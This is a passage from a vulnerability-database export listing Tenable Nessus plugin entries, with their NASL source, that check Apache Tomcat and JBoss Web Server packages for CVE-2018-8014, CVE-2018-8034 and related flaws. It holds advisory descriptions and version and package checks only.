script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"8.0.53\", min:\"8.0.0\", severity:SECURITY_HOLE, granularity_regex:\"^8(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:09:34", "description": "An update is now available for Red Hat JBoss Web Server 5.0 for RHEL 6 and Red Hat JBoss Web Server 5.0 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 5.0 Service Pack 2 serves as a replacement for Red Hat JBoss Web Server 5.0 Service Pack 1, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-03-05T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server 5.0 Service Pack 2 (RHSA-2019:0451)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2020-02-06T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jws5-python-javapackages", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-el-3.0-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-javadoc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsp-2.3-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsvc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-lib", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-selinux", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-servlet-4.0-api", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault-javadoc", "p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:jws5-ecj", "p-cpe:/a:redhat:enterprise_linux:jws5-javapackages-tools", "p-cpe:/a:redhat:enterprise_linux:jws5-jboss-logging", "p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster", "p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster-tomcat"], "id": "REDHAT-RHSA-2019-0451.NASL", "href": "https://www.tenable.com/plugins/nessus/122606", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0451. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122606);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/02/06\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\");\n script_xref(name:\"RHSA\", value:\"2019:0451\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server 5.0 Service Pack 2 (RHSA-2019:0451)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 5.0 for RHEL 6\nand Red Hat JBoss Web Server 5.0 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster),\nthe PicketLink Vault extension for Apache Tomcat, and the Tomcat\nNative library.\n\nThis release of Red Hat JBoss Web Server 5.0 Service Pack 2 serves as\na replacement for Red Hat JBoss Web Server 5.0 Service Pack 1, and\nincludes bug fixes, which are documented in the Release Notes document\nlinked to in the References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8034\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-ecj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-javapackages-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-jboss-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-mod_cluster-tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-python-javapackages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-vault-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jws5-tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-ecj-4.6.1-6.redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-javapackages-tools-3.4.1-5.15.10.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-jboss-logging-3.3.1-5.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-mod_cluster-1.4.0-9.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-mod_cluster-tomcat-1.4.0-9.Final_redhat_1.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-python-javapackages-3.4.1-5.15.10.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-admin-webapps-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-docs-webapp-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-el-3.0-api-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-javadoc-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-jsvc-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-lib-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jws5-tomcat-native-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"jws5-tomcat-native-debuginfo-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.17-26.redhat_26.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-selinux-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-vault-1.1.7-5.Final_redhat_2.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-vault-javadoc-1.1.7-5.Final_redhat_2.1.el6jws\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jws5-tomcat-webapps-9.0.7-17.redhat_16.1.el6jws\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-ecj-4.6.1-6.redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-javapackages-tools-3.4.1-5.15.10.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-jboss-logging-3.3.1-5.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-mod_cluster-1.4.0-9.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-mod_cluster-tomcat-1.4.0-9.Final_redhat_1.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-python-javapackages-3.4.1-5.15.10.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-admin-webapps-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-docs-webapp-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-el-3.0-api-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-javadoc-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-jsp-2.3-api-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-jsvc-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-lib-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-1.2.17-26.redhat_26.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jws5-tomcat-native-debuginfo-1.2.17-26.redhat_26.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-selinux-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-servlet-4.0-api-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-vault-1.1.7-5.Final_redhat_2.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-vault-javadoc-1.1.7-5.Final_redhat_2.1.el7jws\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jws5-tomcat-webapps-9.0.7-17.redhat_16.1.el7jws\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jws5-ecj / jws5-javapackages-tools / jws5-jboss-logging / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:09", "description": "The version of Apache Tomcat installed on the remote host is version 8.0.x prior to 8.0.53. It is, therefore, affected by multiple vulnerabilities:\n\n - The defaults settings for the CORS filter are insecure and enable supportsCredentials for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. (CVE-2018-8014)\n\n - A vulnerability exists that could allow a remote attacker to bypass security restrictions, caused by a missing host name verification when using TLS with the WebSocket client. An attacker could exploit this vulnerability to bypass security constraints to access restricted resources. (CVE-2018-8034)", "cvss3": {}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.0.x < 8.0.53 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2019-05-13T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "700689.PASL", "href": "https://www.tenable.com/plugins/nnm/700689", "sourceData": "Binary data 700689.pasl", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:42", "description": "The version of Apache Tomcat installed on the remote host is at least 7.0.41 and prior to 7.0.90. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Apache Tomcat 7.0.41 < 7.0.90 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_7_0_89.NASL", "href": "https://www.tenable.com/plugins/nessus/111066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111066);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\");\n script_bugtraq_id(104203);\n\n script_name(english:\"Apache Tomcat 7.0.41 < 7.0.90 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by multiple \nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is \nat least 7.0.41 and prior to 7.0.90. It is, therefore, affected by \nmultiple vulnerabilities.\");\n # https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.89\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8757ab94\");\n # https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.90\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45836195\");\n # https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5ab19d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 7.0.90 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"7.0.90\", min:\"7.0.41\", severity:SECURITY_HOLE, granularity_regex:\"^7(\\.0)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:00", "description": "Several minor issues have been fixed in tomcat8, a Java Servlet and JSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an 'httpoxy' issue. The 'cgi' servlet now has a 'envHttpHeaders' parameter to filter environment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-08-14T00:00:00", "type": "nessus", "title": "Debian DLA-1883-1 : tomcat8 security update (httpoxy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5388", "CVE-2018-8014", "CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libservlet3.1-java", "p-cpe:/a:debian:debian_linux:libservlet3.1-java-doc", "p-cpe:/a:debian:debian_linux:libtomcat8-java", "p-cpe:/a:debian:debian_linux:tomcat8", "p-cpe:/a:debian:debian_linux:tomcat8-admin", "p-cpe:/a:debian:debian_linux:tomcat8-common", "p-cpe:/a:debian:debian_linux:tomcat8-docs", "p-cpe:/a:debian:debian_linux:tomcat8-examples", "p-cpe:/a:debian:debian_linux:tomcat8-user", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1883.NASL", "href": "https://www.tenable.com/plugins/nessus/127865", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1883-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127865);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2016-5388\", \"CVE-2018-8014\", \"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Debian DLA-1883-1 : tomcat8 security update (httpoxy)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Several minor issues have been fixed in tomcat8, a Java Servlet and\nJSP engine.\n\nCVE-2016-5388\n\nApache Tomcat, when the CGI Servlet is enabled, follows RFC 3875\nsection 4.1.18 and therefore does not protect applications from the\npresence of untrusted client data in the HTTP_PROXY environment\nvariable, which might allow remote attackers to redirect an\napplication's outbound HTTP traffic to an arbitrary proxy server via a\ncrafted Proxy header in an HTTP request, aka an 'httpoxy' issue. The\n'cgi' servlet now has a 'envHttpHeaders' parameter to filter\nenvironment variables.\n\nCVE-2018-8014\n\nThe defaults settings for the CORS filter provided in Apache Tomcat\nare insecure and enable 'supportsCredentials' for all origins. It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.\n\nCVE-2019-0221\n\nThe SSI printenv command in Apache Tomcat echoes user provided data\nwithout escaping and is, therefore, vulnerable to XSS. SSI is disabled\nby default. The printenv command is intended for debugging and is\nunlikely to be present in a production website.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n8.0.14-1+deb8u15.\n\nWe recommend that you upgrade your tomcat8 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/jessie/tomcat8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.1-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.1-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat8-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8-common\");\n script_set_attribute(attribute:\"cpe\", 